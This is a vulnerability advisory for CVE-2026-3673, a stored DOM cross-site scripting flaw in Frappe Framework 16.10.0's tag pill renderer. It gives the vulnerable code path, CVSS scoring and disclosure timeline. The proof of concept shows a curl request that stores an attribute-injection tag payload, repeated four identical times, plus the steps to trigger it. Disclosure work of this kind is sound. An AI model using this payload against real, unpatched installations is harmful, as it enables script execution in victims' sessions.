

Advisories

Frappe Framework 16.10.0 - Stored DOM XSS in Tag Pill Renderer

4.6

Medium

Detected by

Fluid Attacks AI SAST Scanner

Disclosed by

Oscar Uribe

Summary

Full name

Frappe Framework 16.10.0 - Stored DOM XSS in Tag Pill Renderer

Code name

silvio

State

Public

Release date

Apr 21, 2026

Affected product

Frappe

Vendor

Frappe

Affected version(s)

16.10.0

Vulnerability name

Stored cross-site scripting (XSS)

Vulnerability type

010. Stored cross-site scripting (XSS)

Remotely exploitable

Yes

CVSS v4.0 vector string

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

CVSS v4.0 base score

4.6

Exploit available

Yes

CVE ID(s)

CVE-2026-3673

Description

An authenticated attacker can store a crafted tag value in _user_tags and trigger JavaScript execution when a victim opens the list/report view where tags are rendered. The vulnerable renderer interpolates tag content into HTML attributes and element content without escaping.

Vulnerability

The vulnerable path is:

1. Source: attacker-controlled tag value via frappe.desk.doctype.tag.tag.add_tag.

2. Persistence: _user_tags stores comma-separated tags.

3. Sink builder: ListView.get_tags_html renders:

title="${tag}"
${tag} in inner HTML without escaping.

DOM insertion: rendered row HTML is inserted in list/report view, enabling attribute injection (e.g., onmouseover).

PoC

curl -s -X POST 'http://localhost:18080/api/method/frappe.desk.doctype.tag.tag.add_tag' \
-b /tmp/frappe.cookies \
--data-urlencode 'tag=xss" onmouseover="alert(7171)" z="' \
--data-urlencode 'dt=XSS Parent' \
--data-urlencode 'dn=p48ru7k4hg'

curl -s -X POST 'http://localhost:18080/api/method/frappe.desk.doctype.tag.tag.add_tag' \
-b /tmp/frappe.cookies \
--data-urlencode 'tag=xss" onmouseover="alert(7171)" z="' \
--data-urlencode 'dt=XSS Parent' \
--data-urlencode 'dn=p48ru7k4hg'

curl -s -X POST 'http://localhost:18080/api/method/frappe.desk.doctype.tag.tag.add_tag' \
-b /tmp/frappe.cookies \
--data-urlencode 'tag=xss" onmouseover="alert(7171)" z="' \
--data-urlencode 'dt=XSS Parent' \
--data-urlencode 'dn=p48ru7k4hg'

curl -s -X POST 'http://localhost:18080/api/method/frappe.desk.doctype.tag.tag.add_tag' \
-b /tmp/frappe.cookies \
--data-urlencode 'tag=xss" onmouseover="alert(7171)" z="' \
--data-urlencode 'dt=XSS Parent' \
--data-urlencode 'dn=p48ru7k4hg'

Visit:

http://localhost:18080/app/xss-parent/view/report

Enable Show Tags In list settings, if hidden
Move the cursor over the malicious tag pill

Evidence of Exploitation

Video of exploitation
Static evidence

Our security policy

We have reserved the ID CVE-2026-3673 to refer to this issue from now on.

Disclosure policy

System Information

Frappe
Version: 16.10.0
Operating System: Any

References

Github Repository: https://github.com/frappe/frappe
Security: https://github.com/frappe/frappe/security

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Oscar Uribe from Fluid Attacks' Offensive Team using the AI SAST Scanner.

Timeline



Mar 6, 2026

Vulnerability discovered



Mar 6, 2026

Vendor contacted



Mar 24, 2026

Vendor replied



Apr 21, 2026

Public disclosure

Does your application use this vulnerable software?

During our free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

Start free trial

Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.

Get an AI summary of Fluid Attacks